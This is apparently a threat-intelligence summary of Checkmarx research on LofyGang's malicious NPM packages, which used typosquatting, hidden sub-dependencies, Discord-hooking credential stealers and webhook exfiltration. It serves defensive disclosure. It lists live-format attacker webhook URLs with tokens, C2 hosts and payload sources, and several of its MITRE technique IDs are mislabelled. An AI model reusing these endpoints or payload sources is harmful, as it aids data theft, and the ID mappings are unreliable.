Keypoints
- Researchers traced ~200 malicious open-source packages on NPM tied to the LofyGang group, with thousands of installations.
- LofyGang employed typosquatting and “starjacking” to appear legitimate and trick developers into installing malicious packages.
- Attackers hid malicious code in sub-dependencies so first-level packages stayed clean while delivering payloads at runtime.
- Malicious payloads included password/credential stealers and Discord-specific implants that modify the installed Discord client to capture payment data.
- Command-and-control and payload hosting used legitimate services (Discord, Repl.it, Glitch, GitHub, Heroku) and Discord webhooks for exfiltration.
- Payloads were obfuscated and contained anti-deobfuscation measures that jam debugging tools and the event loop.
- Checkmarx published a public tracker (https://lofygang.info/) and a gist listing the malicious packages for community detection and remediation.
MITRE Techniques
- [T1195] Supply Chain Compromise – LofyGang published malicious packages to public repositories: ‘…trace ~200 malicious open-source packages published in the past year.’
- [T1036] Masquerading – Used typosquatting and repository references to impersonate legitimate packages: ‘…Typosquatting is a technique… like “falsk” instead of “flask.”’
- [T1195] Software Supply Chain – Hiding malicious code in sub-dependencies so top-level packages remain clean: ‘…keep the first-level package clean from malicious code, but having it depend on another package that introduces the malicious code.’
- [T1071.004] Application Layer Protocol: Web Services – Using legitimate cloud and web services as C2 channels: ‘…Discord, Repl.it, glitch, GitHub, and Heroku are just a few services LofyGang is using as C2 servers.’
- [T1056] Input Capture – Modifying the Discord client to hook and capture payment/credential data: ‘…modifying the installed Discord instance with hooks to steal credit cards, sent via Discord webhook…’
- [T1105] Ingress Tool Transfer – Malicious packages sometimes downloaded payloads at runtime from C2 servers: ‘…some downloaded the malicious payload during runtime from c2 servers.’
- [T1567.002] Exfiltration Over Web Service – Stolen data sent via Discord webhooks to attacker-controlled endpoints: ‘…sent via Discord webhook straight to the attackers whenever a payment was made.’
- [T1027] Obfuscated Files or Information – Payloads were obfuscated and included anti-deobfuscation checks to disrupt analysis: ‘…added anti-deobfuscation statements… unpack a naïve regular expression that jams the event loop…’
- [T1609] Supply Chain Compromise: Subcomponent – Re-publishing replacement malicious dependent packages after takedown to regain delivery channels: ‘…whenever the malicious dependent package was caught and removed, the attackers would replace it with a new one…’
Indicators of Compromise
- [Discord webhooks] Exfiltration endpoints used by malware – hxxps://canary[.]discord[.]com/api/webhooks/1010307578896584765/Kfko3kvm_uwgTjZlGgmTnHirUnfqDagEyMjXrPBKn-9oSJXR2-s1SOMxe4zsq_JpbbA6, hxxps://discord[.]com/api/webhooks/1007006820629483640/PcVef3zPDULoGoHQBQu1WK_pLYOMtOdk6ynz0wqSFJf6yv0Ro5iZpMLiZ3Pe4aVKxk-j, and many more webhook URLs listed.
- [Malicious domains / hosting URLs] C2 and payload hosting – hxxps://frequent-level-cornflower[.]glitch[.]me, hxxps://lofy[.]polarlofy7[.]repl[.]co, and additional Glitch/Repl.it/Heroku endpoints.
- [GitHub repositories / raw URLs] Payload and injector hosting – hxxps://github[.]com/NotFubukIl/DiscordTokenGrabber, hxxps://raw[.]githubusercontent[.]com/Balenciaga7/client/main/client[.]js, and other raw GitHub URLs.
- [Paste sites / raw drops] Runtime payload or configuration – hxxps://pastebin[.]com/raw/HMgsiG4k, hxxps://www[.]klgrth[.]io/paste/62fo9/raw, plus several other paste/raw endpoints.
- [Malicious package names / GitHub tools] Known malicious packages and tools – examples include ‘small-sm’ (malicious dependency), ‘fetch-string’ (linked to marketing account), and ‘Discord-Mass-Dm’ which depended on a malicious package.
- [Tracking and reports] Research artifacts – tracker site hxxps://lofygang.info/ and package list gist https://gist.github.com/jossef/aaa9e45c062d973f18bd87c43b9c4fc7
Checkmarx researchers detected LofyGang activity initially via internal engine alerts and then expanded the investigation using retro-hunting to recover deleted package artifacts and historical metadata. They correlated IOC patterns across NPM, GitHub, Repl.it, Glitch, Heroku, and Discord to link roughly 200 malicious packages, using internal tools to reconstruct removed packages and map dependency chains that revealed runtime payload fetches and active C2 locations.
The attackers used a layered delivery approach: typosquatted and starjacked packages to lure developers, clean top-level packages that depended on malicious sub-packages (allowing replacement after takedowns), and runtime fetching of payloads from attacker-controlled web services. Payloads included credential/password stealers and Discord-specific implants that modify the installed Discord client to hook payment flows; stolen data was exfiltrated via Discord webhooks and bespoke bots.
Analysis revealed deliberate defenses against analysts: heavy obfuscation and anti-deobfuscation logic that jams the event loop and thwarts automated unpacking tools. Defenders should focus on detecting irregular package naming/metadata, monitoring dependency trees for unknown sub-dependencies, blocking known C2 domains/webhooks, and preserving repository artifacts for retro-hunting to track and attribute supply-chain malicious activity. Read more: https://checkmarx.com/blog/lofygang-software-supply-chain-attackers-organized-persistent-and-operating-for-over-a-year/